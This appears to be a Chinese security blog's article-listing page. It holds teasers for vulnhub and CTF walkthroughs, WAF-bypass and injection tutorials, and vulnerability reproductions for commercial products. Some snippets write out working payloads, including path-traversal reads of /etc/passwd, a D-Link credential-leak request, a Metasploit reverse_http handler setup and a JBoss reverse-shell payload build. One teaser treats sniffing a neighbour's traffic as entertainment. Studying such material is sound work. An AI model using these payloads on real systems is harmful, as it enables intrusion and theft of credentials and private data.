文章目录有些编辑器有独立后台，在新闻编辑等处查看源代码可能查询到后台地址ewebeditor编辑器一般存在路径/db/，如果存在目录遍历可以下载数据库拿到账号密码密码若是可以找到编辑器后台并顺利进入，自己新建编辑器样式并上传文件添加工具栏…

waf绕过—过360主机卫士sql注入

文章目录绕waf类型数据库特性过360主机卫士SQL注入黑白名单静态文件垃圾字符另类协议大部分waf是基于正则表达式waf规则大多都有黑白名单，尤其是早期的waf，规则写的很死绕waf类型大小写转换法在waf里，使用的正则不完善或者是没有用大小写…

一个综合资产收集和漏洞扫描工具

Komo 介绍 Komo是一个综合资产收集和漏洞扫描工具，并且支持进度记录，通过多种方式对子域进行获取，收集域名，邮箱，子域名存活探测，域名指纹识别，域名反查ip，ip端口扫描，w…

Vulnhub靶机recon: 1渗透

靶机介绍官方下载地址：http://www.vulnhub.com/entry/recon-1,438/ 这是一个基于wprdpress的漏洞，建议使用VirtualBox运行靶机运行环境靶机：网络设为桥接，IP地址：192.168.1.15 攻击机：同网段下的kali l…

【审计思路】如何快速定位SQLMS注入漏洞？

0x00 前言 MCMS是政府、教育等其他行业常用的CMS，应用广泛，但是底层的代码中仍然遗留不少的问题。这篇文章主要针对SQL注入进行审计并探讨如何快速定位SQL注入漏洞，以及其他工具的应用。 MCMS，是完整开源的Java CMS！基…

Ourphp建站系统存在SQL注入

查询用户文笔生疏，措辞浅薄，望各位大佬不吝赐教，万分感谢。免责声明：由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失，均由使用者本人负责， 文章作者不为此承担任何责任…

【漏洞复现】IP-guard WebServer 存在远程命令执行漏洞

漏洞描述 IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件，旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。免责声明技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危…

【漏洞复现】用友U8-Cloud 存在任意文件上传漏洞

漏洞描述 U8 cloud 聚焦成长型、创新型企业的云 ERP，基于全新的企业互联网应用设计理念，为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案，全面支持多组织业务协同、智能财务，人力服务、构建产业链智造平台，融合用友云服务实现企业互联网资源连接、共享、协同。…

flie inclusion 文件包含

目录概述 php语言中的文件包含函数分类 PIKACHU--Fiel inclusion(local) 分析源码 PIAKCHU--file inclusion(remote) 尝试直接包含木马源码分析总结概述在各种开发语言中都内置了文件包含函数，本意是有助于开发人员的效率以及代码的整洁，…

vulnhub之FirstBlood: 1

就冲这名字今天也得拿下！ 目录信息搜集扫描网段扫描IP地址浏览器查看网站查看源代码（view the source） 根据提示到该目录下查看查看该页面的源码使用提示的nikto工具扫描网站 nikto简介常用参数扫描网站查看扫描出的目录…

sqli-labs靶场搭建

sqli-labs靶场搭建 Sqli-labs靶场介绍 Sqli-labs 是一个开源且全面的 SQL 注入练习靶场，手工注入必备的练习环境 sqli-labs靶场相关资源 phpstudy https://www.xp.cn/ sqli-labs https://github.com/Audi-1/sqli-labs 安装sqli-labs 下载后打开一直点击下一步…

vulnhub靶场，DC-3

vulnhub靶场，DC-3 环境准备靶机下载地址：https://www.vulnhub.com/entry/dc-32,312/ 攻击机：kali（192.168.58.130） 靶机：DC-3（192.168.58.146） 下载好靶机之后直接使用VMware Wor…

vulnhub靶场，West-Wild-v1.1

vulnhub靶场，West-Wild-v1.1 环境准备靶机下载地址：https://www.vulnhub.com/entry/westwild-11,338/ 攻击机：kali（192.168.58.130） 靶机：West-Wild-v1.1（192.168.58.158） 下载好…

vulnhub靶场，Os-hackNos-1

vulnhub靶场，Os-hackNos-1 环境准备靶机下载地址：https://www.vulnhub.com/entry/hacknos-os-hacknos,401/ 攻击机：kali（192.168.58.130） 靶机：Os-hackNos-1（192.168.58.156） 下载…

vulnhub靶场，Cherry

vulnhub靶场，Cherry 环境准备靶机下载地址：https://www.vulnhub.com/entry/cherry-1,552/ 攻击机：kali（192.168.109.128） 靶机：Cherry（192.168.109.132） 下载好靶机之后直接使用V…

vulnhub靶场，Bob_v1.0.1

vulnhub靶场，Bob_v1.0.1 环境准备靶机下载地址：https://www.vulnhub.com/entry/bob-101,226/ 攻击机：kali（192.168.109.128） 靶机：Bob_v1.0.1（192.168.109.172） 下载好靶机之后直…

weblogic反序列化漏洞(CVE-2017-10271)

受影响版本受影响WebLogic版本：10.3.6.0.0，12.1.3.0.0，12.2.1.1.0，12.2.1.2.0 漏洞利用 1:初步判断访问 http://x.x.x.x:7001/wls-wsat/CoordinatorPortType11， 存在下图则说明可能存在漏洞 2:构造POST包进行测试…

windows2003下asp环境搭建

01 安装IIS 01 找到控制面板 02 添加或删除程序 03 添加/删除windows组件 04 选择应用程序服务器, 并点击详细信息 05 勾选ASP.NET --> 点击 IIS --> 点击详细信息 06 勾选万维网服务 02 安装winrar解压软件 01 双击 winrar.exe文件 02 普通安装 03 网站搭建 01 在…

vulnhub靶场，SICKOS: 1.1

vulnhub靶场，SICKOS: 1.1 环境准备靶机下载地址：https://www.vulnhub.com/entry/sickos-11,132/ 攻击机：kali（192.168.109.128） 靶机：SICKOS: 1.1（192.168.109.189） 下载好靶机之…

vulnhub靶场，CORROSION: 1

vulnhub靶场，CORROSION: 1 环境准备靶机下载地址：https://www.vulnhub.com/entry/corrosion-1,730/ 攻击机：kali（192.168.109.128） 靶机：CORROSION: 1（192.168.109.192） 下载好靶…

JsFu0k批量探测JS存在的敏感关键字

这是一个演示 GitHub地址：https://github.com/jumppppp/go/tree/master/htools/jsfu0k 输出窗口输出的详细文件以上演示的是全字匹配这个自动化工具模仿人工在一个网页内进行寻找js中敏感信息流程： 填写配置（输入批量域名&#xff0…

CSMSF联动

CS&MSF联动 CS联动MSF 现在CS这边已经成功上线一台主机，需要将这个会话传入MSF CS这边新建一个监听器然后打开MSF use exploit/multi/handler set payload windows/meterpreter/reverse_http #需要设置成CS一样的payload set lhost 192.168.109.128 set …

vulnhub靶场，DC-4

vulnhub靶场，DC-4 环境准备靶机下载地址：https://www.vulnhub.com/entry/dc-4,313/ 攻击机：kali（192.168.58.130） 靶机：DC-4（192.168.58.147） 下载好靶机之后直接使用VMware Work…

越权访问漏洞

越权漏洞越权访问漏洞示意图一、越权访问漏洞简介 1.类型水平越权：通过更换的某个ID之类的身份标识，从而使A账号获得（增删查改）B账号的数据垂直越权：使用低权限身份的账号，发送高权限账号的请求&…

PwnTheBox 游园会的集章卡片

打开题目看件有个zip文件，把他下载下来解压出来会发现有很多的图片打开其中的一张，似乎是一张图片残缺的一部分根据题意应该是吧所有的图片都拼在一起就可以看到flag了

sql 注入(3), 报错型注入

报错型注入无法使用 union 注入时, 尝试报错注入往往很有效. 一, 不适用 union 注入的情况: 在页面上无法显示查询结果.从页面变化或报错信息中无法探测出有效的列数. 二, mysql处理xml文件情景: 表名为 [xmltable], 表中列名为 [testxml], 值是字符串类型, 保存了一段…

ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程命令执行漏洞

ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程代码执行漏洞漏洞概述: ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架。借鉴Struts框架的Action对象，同时也使用面向对象的开发结构和MVC模式。1月11日，ThinkPHP官方发布新版本5.0.24&#xff0c…

[ vulnhub靶机通关篇 ] Empire Breakout 通关详解

🍬 博主介绍 👨‍🎓 博主介绍：大家好，我是 _PowerShell ，很高兴认识大家~ ✨主攻领域：【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】 🎉点赞➕评论➕收藏养成习…

看我如何用kali实时截获隔壁小姐姐的上网隐私(结尾有彩蛋)

看我如何用kali实时截获隔壁"小姐姐"的上网隐私(结尾有彩蛋) 山有木兮木有枝，心悦君兮君不知知己知彼，百战不殆，简单介绍一些原理： ARP协议：地址解析协议，它是根据IP地址获取MAC地址的一个TC…

四、Kali Linux 2 主动扫描

主动扫描： 相对被动扫描而言，主动扫描的范围要小得多。主动扫描一般都是针对目标发送特制的数据包，然后根据目标的反应来获得一些信息。这些信息主要包括目标主机是否在线，目标主机的指定端口是否开放，目标主机的操作…

六、Kali Linux 2 远程控制

远程控制那么回过头来看，如果目标计算机上运行的VSFTPD v2.3.4被黑客使用笑脸漏洞成功渗透，就会自动在6200端口打开一个连接，而黑客可以通过这个连接实现对目标的控制。如果将这个连接比作一个很小的入口，它可能刚刚能容纳一个人…

九、Kali Linux 2 社会工程学工具

社会工程学工具社会工程学是一种通过研究受害者心理，并以此诱使受害者做出配合，从而达到自身目的的方法。其实我一直觉得社会工程学和中国古代的“千术”十分类似，二者都是“欺骗的艺术”。历史上最著名的黑客米特尼克在他的作品《反欺骗的…

BUUCTF Reverse(xor)

BUUCTF Reverse(xor) 首先用exeinfoPE判断一下，得到是64位的，没有加壳。接下来，用IDA64打开，找到main函数，F5反编译，查看伪代码： int __cdecl main(int argc, const char **argv, const char …

CTF中干扰逆向分析的几种技术的介绍和解题思路

CTF中干扰逆向分析的几种技术的介绍和解题思路常见的干扰逆向分析的技术：花指令，反调试，加壳，控制流混淆，双进程保护，虚拟机保护技术 1.花指令这是一种比较简单的技巧，在原始的代码中插入一…

【Hack The Box】linux练习-- Previse

HTB 学习笔记【Hack The Box】linux练习-- Previse 🔥系列专栏：Hack The Box 🎉欢迎关注🔎点赞👍收藏⭐️留言📝 📆首发时间：🌴2022年11月27日🌴 &#x1f…

渗透测试工具大全

渗透测试工具大全渗透测试练习平台数据库注入练习平台用node漏洞练习平台扫描器工具端口扫描器Nmap本地网络扫描器子域名扫描器漏洞路由扫描器迷你批量信息泄漏扫描脚本Waf类型检测工具信息搜集工具社工插件Github信息搜集Repo信息搜集工具WEB工具webshell大合集渗透以及web攻击…

2023年网络安全HW攻防技术总结（珍藏版）

2022年护网正当时，相信不少网安人都已经进入了状态。我们都知道， 护网行动是国家应对网络安全问题所做的重要布局之一。至今已经是7个年头了，很多公司在这时候人手不够，因此不得不招募一些网安人员来参加护网。红队扮演攻击…

2023年护网常见面试题汇总！看过的都通过面试啦！

时间过得很快，回想起去年的这个时候，我也正在准备秋招，今天的我刚刚结束培训。我的个人情况就读于某双非大学，信息与计算科学（大数据方向，校企合作，一个介于数学与计算机之间的专业&#xf…

ThinkPHP-Shop2020版本的商城CMS前端SQL注入

0x01、漏洞名描述 ThinkPHP-Shop2020版本的商城CMS前端SQL注入 0x02、fofa "ThinkPHP-Shop"0x03、POC http://x.x.x.x//mobile/index/index2/id/1* 0x04、漏洞复现

八、Kali Linux 2 Armitage

Armitage 其实命令行的操作方式之所以让很多人感到困难，主要是由于大多数人从小就习惯了Windows操作系统以及这个系统中的图形化操作软件。因此如果Metasploit有一个图形化的操作界面，那么学习起来将会是一个十分愉快的过程。 Armitage就是一款使用Jav…

Fiddler配置双重代理测试Web应用程序

前提：很多Web应用程序只能使用IE打开（特别是银行的很多应用程序）。在针对上述类型的Web应用程序执行安全测试时，必须要在Windows中使用IE。Windows中抓取Web应用程序流量的工具我偏向使用Fiddler，但是Fiddler在对数据…

本机ip与外网ip（附带查询方法）

1.二者的区别外网IP：是全世界唯一的IP地址，仅分配给一个网络设备。内网IP：是由路由器分配给每一部内部使用的IP地址，而内网的所有用户都是通过同一个外网IP地址进行上网的，而内网的IP地址每个人的都不一样&#xff…

老大给的三个问题

🍬 博主介绍 👨‍🎓 博主介绍：大家好，我是 _PowerShell ，很高兴认识大家~✨主攻领域：【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】🎉点赞➕评论➕收藏养成习惯…

[ 渗透入门篇 ] 渗透行业必备术语大集合(全 -- 五万字总结)

🍬 博主介绍 👨‍🎓 博主介绍：大家好，我是 _PowerShell ，很高兴认识大家~✨主攻领域：【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】🎉点赞➕评论➕收藏 == 养成习惯（一键三连）😋🎉欢迎关注💗一起学习👍一起讨论⭐️一…

[ 渗透入门篇 ] 渗透行业必备术语大集合(二)

🍬 博主介绍 👨‍🎓 博主介绍：大家好，我是 _PowerShell ，很高兴认识大家~✨主攻领域：【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】🎉点赞➕评论➕收藏 == 养成习惯（一键三连）😋🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末…

CobaltStrike 应用教程

课程大纲第一章：介绍与安装介绍与安装第二章：payload 应用创建监听及生成 payloadoffice 宏 payload 应用https payload 应用搜集目标基本信息网页挂马应用钓鱼页面应用批量发送钓鱼邮件第三章：免杀应用使用 c# 免杀使用 powershel…

IMAP/SMTP 注入

0x00：介绍 IMAP 就是 Internet Mail Access Protocol 的缩写翻译来就是邮件访问协议，也就是用来收邮件的（和它类似的还有个 POP3，也是用来收邮件的）。SMTP 就是 Simple Mail Transfer Protocol 的缩写翻译来就是邮件传…

SSI注入

0x00：介绍 SSI 是 Server Side Includes 的缩写，即服务端包含。我们都知道像后台语言 php、asp 等都有文件包含的函数 include，包含一些公共的函数库等。那么 html 也有这种包含的机制，我们可以把它叫做 SSI。SSI 还有一些使用情…

A2 失效的身份认证和会话管理

0x00：身份认证介绍我们先来介绍失效的身份认证，对于身份认证大家已经再熟悉不过了，其用来控制一些文件、数据、网页等访问的控制，例如最常见的账号和密码，各种登录功能等。除了账号和密码外，常见的还有一…

经常使用的2个google镜像网站

经常使用的2个google镜像网站 https://g.vovososo.comhttps://google.zenith.gq 如果各位大佬还有其他的镜像网站，欢迎在下方留言，互相交流一下

burp suite的安装与基本使用

1. burp suite的下载可以在官网上下载，https://portswigger.net/burp/，除了这个社区版还有专业版，不过需要付费但是会给你一个月的试用期。安装burp会用到jdk，所以必须先配置好jdk , 下载安装自行百度。 2. 对于初学者如果想用专…

利用python的requests模块获取HTTP信息

利用python的requests模块获取HTTP信息 import requests #导入requests模块 from colorama import Fore, Back, Style #关键词高亮显示出来requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) #当访问网站的证书不安…

XCTF 攻防世界 Reverse新手题(insanity, python-trade)

XCTF 攻防世界 Reverse新手题(insanity, python-trade) 1. insanity 这一题十分的简单，将下载下来的附件直接用IDA打开，查看Hey-View，在最右侧一栏进行查找，大概在后半部分，可以直接看到flag 2. python-trade 首先…

从信息安全工程师真题提取重要知识点（1）

从信息安全工程师2018真题解析提取重要知识点（上） SM9 标识密码算法是一种基于双线性对的标识密码算法， 它可以把用户的身份标识用以生成用户的公、私密钥对 ,主要用于数字签名、数据密、密钥交换以及身份认证等; SM9 密码算法的密钥长度为…

svn源码泄漏

看案例的时候，看到了这个漏洞。总结一下。 svn 是源代码版本管理软件，造成svn源代码漏洞的主要原因是管理员操作不规范。在使用svn管理本地代码的时候，会自动生成一个名为.svn的隐藏文件夹，其中包含重要的源码信息。但是有的管…

Web渗透测试流程

文章目录什么是渗透测试WEB渗透测试流程1.明确目标2.分析风险，获得授权3.信息收集4.漏洞探测（手动&自动）5.漏洞验证6.信息分析7.利用漏洞，获取数据8.信息整理9.形成报告补充信息收集漏洞探测漏洞利用内网转发内网渗透痕迹清除…

渗透测试靶机：DC-1

GoGoGO!!! 这篇文章是看着大佬的文章，跟着复现，学习思路。一共5个flag，全部找到。 1、靶机名字：DC-1，很好找，这里不放链接了。 : ) 2、靶机下载后，我一开始是用VMware Workstation导入的.ov…

vulnhub靶场，WEB DEVELOPER: 1

vulnhub靶场，WEB DEVELOPER: 1 环境准备靶机下载地址：https://www.vulnhub.com/entry/web-developer-1,288/ 攻击机：kali（192.168.109.128） 靶机：WEB DEVELOPER: 1（192.168.109.191&#xff…

网络安全（黑客）快速入门~

网络安全的学习需要遵守循序渐进，由浅入深。通常网络安全学习方法有两种： 方法1：先学习编程，然后学习Web渗透及工具使用等； 适用人群：有一定的代码基础的小伙伴基础部分基础部分需要学习以下内容&am…

网络安全行业现在好混吗，工资水平怎么样？

前段时间看到有人私信：网络安全行业现在好混吗，工资水平怎么样？今天在这里做个回答，不知你所说的“好混吗”指的是什么？ 薪资高，待遇好？不加班，活儿少？不受气&#xff0…

【漏洞复现】深信服科技EDR平台存在任意用户登录漏洞

漏洞描述深信服终端检测响应平台EDR,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。该EDR系统存在任意用户登录漏洞，攻击者通过漏洞可以登录系统后台并获取服务器的敏感信息…

Metasploit入门教程（非常详细）从零基础入门到精通，看完这一篇就够了！

通过本篇文章，我们将会学习以下内容： 1、在Windows上安装Metasploit 2、在Linux和MacOS上安装Metasploit 3、在Kali Linux中使用 Metasploit 4、升级Kali Linux 5、使用虚拟化软件构建渗透测试实验环境 6、配置SSH连接 7、使用SSH连接Kali 8、配…

记一次从web到内网的渗透

记一次从web到内网的渗透拓扑图环境介绍现在有三台机器，分别为target1，target2，target3，里面分别有三个flag，每个flag的分值不同，需要通过拿下一个已知IP（target1）进而向内网里…

bwapp下载安装

下载地址： https://sourceforge.net/projects/bwapp/ 安装： 解压缩将压缩包解压到www目录进入bwapp/admin/,打开setting.php文件，修改数据库用户名密码安装数据库打开浏览器，输入 http://localhost/bwapp/bwapp/install.p…

关于http网络通信数据包封装的过程

当我们谈论网络通信时，数据在从源到目的地传输的过程中会通过多层网络协议。在每一层，都会添加一些头信息（和有时尾信息）来帮助处理和传输数据。这个过程被称为"封装"（Encapsulation）。简单来说&…

【漏洞复现】大华 DSS 数字监控系统 itcBulletin SQL 注入

漏洞描述大华 DSS存在SQL注入漏洞，攻击者 pota/services/itcBuletin 路由发送特殊构造的数据包，利用报错注入获取数据库敏感信息。攻击者除了可以利用 SQL注入漏词获取数据库中的信息例如，管理员后台密码、站点的用户人人信息)之外，甚至在高权限的情况可向服务器中写入木…

慢速 HTTP 攻击 Slow HTTP Attack

漏洞名称 ：Slow Http attack、慢速攻击漏洞描述：慢速攻击基于HTTP协议，通过精心的设计和构造，这种特殊的请求包会造成服务器延时，而当服务器负载能力消耗过大即会导致拒绝服务。HTTP协议规定，HTTP Reques…

一个扫描常见敏感目录的burpsuite插件

SpringScan 介绍一个扫描Spring的常见敏感目录的burp suite插件直接添加插件即可，自动扫描详细功能页面 1、被动扫描页面 2、主动扫描页面 3-配置页面工具下载地址一个扫描常见敏感目录的burpsuite插件https://mp.weixin.qq.com/s/6ZlfsVVtvVEB6DZVdtUKoQ

技战法-信息收集

搜索引擎语法 Google hacking： site: 限制搜索范围为某一网站，例如: site:baidu.com"admin”可以搜索baidu.com 网站上包含关键词“admin”的页面。 inurl: 限制关键字出现在网址的某个部分，例如: inurl:php?id 可以搜索网址中包含 ph…

曲线救国-通过Magisk安装burp证书到系统根目录

0x01前言需要对某APP做渗透测试，但该APP做了限制：不信任用户证书。因此需要将burp证书导入到存放系统证书目录下。虽然手机装了Magic，但似乎root有点问题。其挂载有问题，导致无法将最初尝试：mount -o rw,remount -t…

DVWA 之 Brute Force

DVWA 之 Brute Force 实验环境：Win7 win2k8 Brute Force，即暴力（破解），是指黑客利用密码字典，使用穷举法猜解出用户口令 ** Low 级 ** 首先在WIN7上把安全级别改成LOW 打开WIN7访问http:192.168.60.22:81暴…

【漏洞复现】某 NVR 视频存储管理设备远程命令执行

漏洞描述 NUUO NVR是中国台湾NUUO公司旗下的一款网络视频记录器，该设备存在远程命令执行漏洞，攻击者可利用该漏洞执行任意命令，进而获取服务器的权限。免责声明技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律&am…

内网渗透之哈希传递

文章目录哈希传递（NTLM哈希）概念LMNTLM 原理利用hash传递获取域控RDP 总结哈希传递（NTLM哈希） 内网渗透中找到域控IP后使用什么攻击手法拿下域控： 扫描域控开放端口。因为域控会开放远程连接：windows开…

sql union 注入

sql union 注入一, 参数分类根据可控参数的类型不同, 对注入类型分类: 1. 数字型select * from table where id1 2. 字符型select * from table where usernameroot 3. 搜索型select * from table where id like %root% 4. 关于注释:注入时, 在查询参数中使用注释需要url编…

sql 注入(2), 文件读写木马植入远程控制

sql 注入文件读写木马植入远程控制一, 检测读写权限查看mysql全局变量 SHOW GLOBAL VARIABLES LIKE %secure%secure_file_priv 空, 则任意读写secure_file_priv 路径, 则只能读写该路径下的文件secure_file_priv NULL, 则禁止读写二, 读取文件, 使用 load_file() 函数…

红队打靶：Nyx: 1打靶思路详解（vulnhub）

目录写在开头第一步：主机发现和端口扫描第二步：ssh私钥登录获取初始立足点第三步：sudo gcc提权番外篇：如何掉进web渗透的陷阱无法自拔总结与思考写在开头我个人的打靶顺序是根据红队笔记大佬的视频顺序&#xff0…

逻辑漏洞yu越权

越权与逻辑漏洞越权原理如果用A用户的权限取操作B用户的数据，A的权限小于B的权限，如果能够成功操作，则称之为越权操作。越权漏洞形成的原因是后台使用了不合理的权限校验规则导致的一般越权漏洞容易出现在权限页面(需要登陆的页面)&a…

burpsuite全套使用教程

burpsuite实验环境安装教程浏览器配置篇使用方法Target模块(目标模块)Proxy模块(代理模块)Spider模块(蜘蛛爬行)Scanner模块(漏洞扫描)Intruder模块decoder模块(编码模块)Comparer模块(比较器)RepeaterSequencer实验环境 burpsuite1.733 win10 dvwa firefox 安装教程第一步…

看完这篇教你玩转渗透测试靶机vulnhub——DC6

Vulnhub靶机DC6渗透测试详解Vulnhub靶机介绍：Vulnhub靶机下载：Vulnhub靶机安装：Vulnhub靶机漏洞详解：①：信息收集：②：暴力破解：③：漏洞发现：④：漏…

常见WEB漏洞

目录 XSS（跨站脚本攻击） 概念分类存储型XSS 反射型XSS DOM型XSS XSS（跨站脚本攻击） 概念黑客通过“HTML注入”篡改网页，插入恶意脚本，当用户浏览网页时，实现控制用户浏览器行为的一种…

2021年“网络安全”赛项郑州市选拔赛任务书

2021年“网络安全”赛项郑州市选拔赛任务书一、竞赛时间共计3小时。二、竞赛阶段竞赛阶段任务阶段竞赛任务竞赛时间分值第一阶段单兵模式系统渗透测试任务一 SSH弱口令渗透测试 100分钟 100 任务二 Linux操作系统渗透测试 100 任务三服务器内部信息获取 100 任务四…

面向红队的自动化引擎工具

gogo 介绍面向红队的、高度可控的可拓展的自动化引擎。特征如下： 自由的端口配置支持主动/主动指纹识别关键信息提取，如标题、证书以及自定义提取信息的正则支持nuclei poc，poc目录：https://chainreactors.github.io/wiki/…

2021年江苏省职业院校技能大赛中职 “网络信息安全”赛项（超详细）

2021年中职组“网络空间安全”赛项一.江苏省竞赛任务书二.任务书解析：三.不懂的可以私信博主！一.江苏省竞赛任务书一、竞赛时间 8：00—11：00 共计3小时二、竞赛阶段竞赛阶段任务阶段竞赛任务竞赛时间分值第①阶段：单兵模式系统渗透测试任务一：攻击日志分析 …

Metasploit渗透测试（双脉冲星）

MS17-010(EternalBlue) 靶机：win7:service Pack1 172.16.5.201 靶机下载攻击机：kali 172.16.5.158 而且要保证两台机器之间可以ping通因为kali里面没有这个rb源代码所以我们要把这个模块导入进去我们先要smb模块下载到这里面 #cd /usr/share/m…

XenMobile目录遍历任意文件读取(CVE-2020-8209)

XenMobile目录遍历任意文件读取(CVE-2020-8209) 利用此漏洞，可以读取Web服务器根目录之外的任意文件，包括配置文件和敏感的加密密钥。不需要授权。 POC（路径遍历） /jsp/help-sb-download.jsp?sbFileName../../../etc/passwd解…

VoIPmonitor 远程命令执行漏洞( CVE-2021-30461)

漏洞描述 VoIPmonitor是“具有在Linux上运行的SIP RTP和RTCP VoIP协议的具有商业前端的开源网络数据包嗅探器”。使用通过Web界面到达的用户提供的数据，允许未经身份验证的远程用户触发VoIPmonitor中的远程PHP代码执行漏洞。漏洞影响 VoIPmonitor < 24.60 …

Vmware vcenter未授权任意文件上传漏洞(CVE-2021-21972)

背景 CVE-2021-21972 vmware vcenter的一个未授权的命令执行漏洞。该漏洞可以上传一个webshell至vcenter服务器的任意位置，然后执行webshell即可。影响版本 vmware:esxi:7.0/6.7/6.5 vmware:vcenter_server:7.0/6.7/6.5 漏洞复现 fofa查询语法:title" …

(2)Nmap

笔记目录渗透测试工具(1)wireshark 渗透测试工具(2)Nmap渗透测试工具(3)Burpsuite 1.工具简介 (1)定义 ①功能网络扫描和嗅探工具包，三个主要基本功能： 探测一组主机是否在线扫描主机端口、嗅探所提供的网络服务推断出主机所用的操作系统 ②namp …

ThinkAdmin任意文件读取漏洞（CVE-2020-25540）

简述 ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统漏洞描述 ThinkAdmin6版本存在路径遍历漏洞。该漏洞主要是因为api中存在危险函数，没有任何过滤。攻击者可利用该漏洞通过请求编码参数任意读取远程服务器上的任意文件。漏洞复现 fofa搜索语句 app&q…

众安天下众测平台邀请码获取

众安天下众测平台邀请码获取之前获得邀请码做的一个小游戏，简单记录一下。小游戏获取通过注册页面，如何获取获取邀请码，找到游戏入口。目录遍历 http://119.3.191.245:8877/info.php http://119.3.191.245:8877/Login.php 使用…

SolarWinds Orion API 远程代码执行漏洞（CVE-2020-10148）

漏洞简述 SolarWinds 发布了 SolarWinds 代码执行漏洞的风险通告，该漏洞编号为 CVE-2020-10148，漏洞等级：高危。 SolarWinds公开了供应链攻击之外的一处漏洞。该漏洞允许未授权的攻击者在受影响的SolarWinds系统上执行任意代码。漏洞详情…

Fastjson 1.2.24 反序列化(CVE-2017-18349)漏洞复现

fastjson简介 fastjson是阿里巴巴的开源JSON解析库，它可以解析JSON格式的字符串，支持将Java Bean序列化为JSON字符串，也可以从JSON字符串反序列化到JavaBean。影响范围 fastjsonfastjson<1.2.24 漏洞复现使用vulhub cd /app/vulhub-2…

JBoss Application Server 反序列化漏洞

JBoss Application Server 反序列化漏洞 CVE-2017-12149 http://192.168.11.123:8080/invoker/readonly 1:执行生成二进制的payload文件 javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java 2:修改接受shell的主机IP和端口 java -cp .:…

Kioptrix Level 1(#1)

Kioptrix Level 1(#1) 目标:Kioptrix Level 1(VMware) 攻击机:kali(192.168.43.80) 网关:192.168.43.255 #1查看Kioptrix在内网的ip地址 nmap 192.168.43.0/24 -n -sP -sn -n 不做DNS解析 -sP ping扫描 -sn 不做端口扫描得到ip192.168.43.36 #2查看端口开放情况(nmap) …

用友grp-u8SQL注入命令执行

用友grp-u8SQL注入&命令执行 fofa搜索语句 title“GRP-U8” 1、查询版本信息:select version 2、验证是否为sa权限:select IS_SRVROLEMEMBER(‘sysadmin’) //返回 1，说明是sa权限，可执行sql语句。 3、判断目标机的MSSQL服务是否存在xp_cmdshell扩…

【漏洞复现】panalog日志审计系统任意用户创建漏洞和后台命令执行

漏洞描述 panalog为北京派网软件有限公司，一款流量分析，日志分析管理的一款软件。存在任意用户创建漏洞和后台命令执行漏洞，可先通过任意用户创建，然后进行后台命令执行，获取服务器权限。免责声明技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公…

【漏洞复现】酒店宽带运营系统RCE

漏洞描述安美数字酒店宽带运营系统 server_ping.php 远程命令执行漏洞免责声明技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益&#xff…

BurpSuite工具详解及暴库示例

一.Burp Suite工具安装及配置 1.Burp Suite Burp Suite是用于Web应用安全测试、攻击Web应用程序的集成平台，它将各种安全工具无缝地融合在一起，以支持整个测试过程中，从最初的映射和应用程序的攻击面分析，到发现和利用安全漏洞…

网络安全入门教程（非常详细）从零基础入门到精通，看这一篇就够了。

基本方向: 1.web安全方面(指网站服务器安全方面,进行渗透测试,检测漏洞以及安全性) 2.逆向破解方面(对软件进行破解,脱壳) 以下内容是针对web安全方面的网络安全技术讲解: 如果你对网络安全方面没有任何的了解,如何成为一名网络安全这个问题对你来说很迷茫的话.接下来我将从以…

南昌大学漏洞报送证书

获取来源：edusrc（教育漏洞报告平台） url：https://src.sjtu.edu.cn/ 兑换价格：20金币获取条件：南昌大学任意中危或以上级别漏洞

【漏洞复现】Viessmann Vitogate远程代码执行(CVE-2023-45852)

漏洞描述 Vitogate 300 2.1.3.0版本的/cgi-bin/vitogate.cgi存在一个未经身份验证的攻击者可利用的漏洞，通过put方法中的ipaddr params JSON数据中的shell元字符实现绕过身份验证并执行任意命令。免责声明技术文章仅供参考，任何个人和组织使用网络…

【漏洞复现】锐捷RG-EW1200G登录绕过

漏洞描述免责声明技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作…

D-Link账号密码泄露

构造payload： /getcfg.php SERVICESDEVICE.ACCOUNT&attackture%0D%0AAUTHORIZED_GROUP%3D1漏洞证明： 文笔生疏，措辞浅薄，望各位大佬不吝赐教，万分感谢。免责声明：由于传播或利用此文所提供的信息、技…

锐捷EG易网关 phpinfo.view.php 信息泄露

致未经身份验证获取敏感信息访问漏洞url： /tool/view/phpinfo.view.php漏洞证明： 文笔生疏，措辞浅薄，望各位大佬不吝赐教，万分感谢。免责声明：由于传播或利用此文所提供的信息、技术或方法而造成的任何…

【逆向】NahamCon CTF -Click Me Writeup（BridaFrida Hook 拿Flag）

文章目录前言一、样式与功能点二、反编译三、Frida Get Flag四、BurpSuite插件-Brida总结前言第一次做外国CTF比赛的mobile challenge 题，题目就是一个安卓的apk安装包。顺便记录一下代码分析过程以及分享两种不同的解题思路。提示：以下是本篇文章正…

网神下一代极速防火墙任意文件读取漏洞

访问漏洞url： /?gpki_file_download&filename../../../../../etc/passwd漏洞证明： 文笔生疏，措辞浅薄，望各位大佬不吝赐教，万分感谢。免责声明：由于传播或利用此文所提供的信息、技术或方法而造…

PHP比较漏洞, 代码审计, 字符串数字, “0e“字符串, 布尔值比较, 极限值, switch比较, in_array比较

